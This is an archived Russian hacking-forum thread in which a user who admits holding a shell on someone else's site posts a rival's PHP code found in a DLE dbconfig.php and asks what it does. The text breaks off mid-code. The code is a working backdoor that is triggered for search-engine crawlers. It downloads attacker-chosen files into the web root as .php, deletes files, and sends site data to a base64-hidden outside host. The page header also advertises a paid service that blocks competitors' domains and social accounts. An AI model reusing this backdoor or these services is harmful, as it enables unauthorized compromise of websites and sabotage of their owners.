УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Что делает сосед по шеллу?

Опции темы

Поиск в этой теме

Опции просмотра

13.09.2012, 09:37

spiderbuber

Познающий

Регистрация: 20.10.2010

Сообщений: 61

Провел на форуме:
19136

Репутация: 0

Сегодня на одном брошенном шелле заметил соседа.

Движок ДЛЕ, код был в dbconfig.php

Интересует, что делает его код?

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_content_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]){

    if([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"];

    }

    else{

[/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"];

    }

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

          

          if( @[/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'curl_init'[/COLOR][COLOR="#007700"]) ){

               if([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]() ){

                    

                    if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

                    if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

                    if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_CONNECTTIMEOUT[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

                    if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

                    if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_ENCODING[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"gzip,deflate"[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

                    

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]);

                    @[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]);

               }

          }

          else{

[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]);

               

               if([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]],!empty([/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'port'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'port'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"]) ){

                    

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'GET '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' HTTP/1.0'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'Host: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'Connection: Close'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"];

                    

                   @[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

                         

                    while( ![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]) ){

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"].= @[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]);

                    }

                    

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);

                    

                    @[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);

               }

          }

          

          return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

}

function[/COLOR][COLOR="#0000BB"]filtr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]){

    return[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripcslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"']*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]))));

}

function[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"::::"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]);

    return[/COLOR][COLOR="#0000BB"]filtr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]);

}

function[/COLOR][COLOR="#0000BB"]get_n_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"']*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$all[/COLOR][COLOR="#007700"]);

    foreach([/COLOR][COLOR="#0000BB"]$all[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]);

    

[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^www\./'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_HOST"[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^www\./'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

    

    if([/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"];

    }

    }

    return[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);

}

function[/COLOR][COLOR="#0000BB"]title_desc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]){

    global[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"];

    if([/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'\]*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$math[/COLOR][COLOR="#007700"])){

    foreach([/COLOR][COLOR="#0000BB"]$math[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]){

        if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"description"[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'content=[\"\'](.*?)[\"\']'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

        }

        if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"keywords"[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'content=[\"\'](.*?)[\"\']'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

        }

        if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Content-Type"[/COLOR][COLOR="#007700"]) or[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"content-type"[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'charset=(.*?)[\"\']'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);

        }

}

    }

    if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"']*>(.*?)]*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"])){

        if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'&raquo;'[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'(.*?)&raquo;'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);

        else[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

    }

}

     

function[/COLOR][COLOR="#0000BB"]get_asp[/COLOR][COLOR="#007700"](){

    global[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$URI[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"REQUEST_URI"[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$HOST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_HOST"[/COLOR][COLOR="#007700"]];

    

    if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Yandex'[/COLOR][COLOR="#007700"]) or[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Google'[/COLOR][COLOR="#007700"])){

        print[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];

    

    if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_onload'[/COLOR][COLOR="#007700"]]){

        if(@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_onload'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'in'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {

            @[/COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_onload'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'in'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0666[/COLOR][COLOR="#007700"]);

            print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

        }

    }

    if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_unload'[/COLOR][COLOR="#007700"]]){

        if(@[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_unload'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

    }

    

[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_content_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'aHR0cDovLw=='[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$HOST[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$URI[/COLOR][COLOR="#007700"]);

            

[/COLOR][COLOR="#0000BB"]title_desc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]);

    

[/COLOR][COLOR="#0000BB"]$s_temp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/main.tpl'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$vs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_n_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$temp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_n_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s_temp[/COLOR][COLOR="#007700"]);

    

[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'n'[/COLOR][COLOR="#007700"];

    

    if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Yandex'[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'y'[/COLOR][COLOR="#007700"];

    }

    elseif([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Google'[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'g'[/COLOR][COLOR="#007700"];

    }

    

    if([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'utf-8'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

    }

[/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_content_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'aHR0cDovL3BvZHN0YXZhLndzL2NvbmVjdC5waHA/dXJsPQ=='[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$URI[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&host='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HOST[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&t='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'&k='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'&d='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/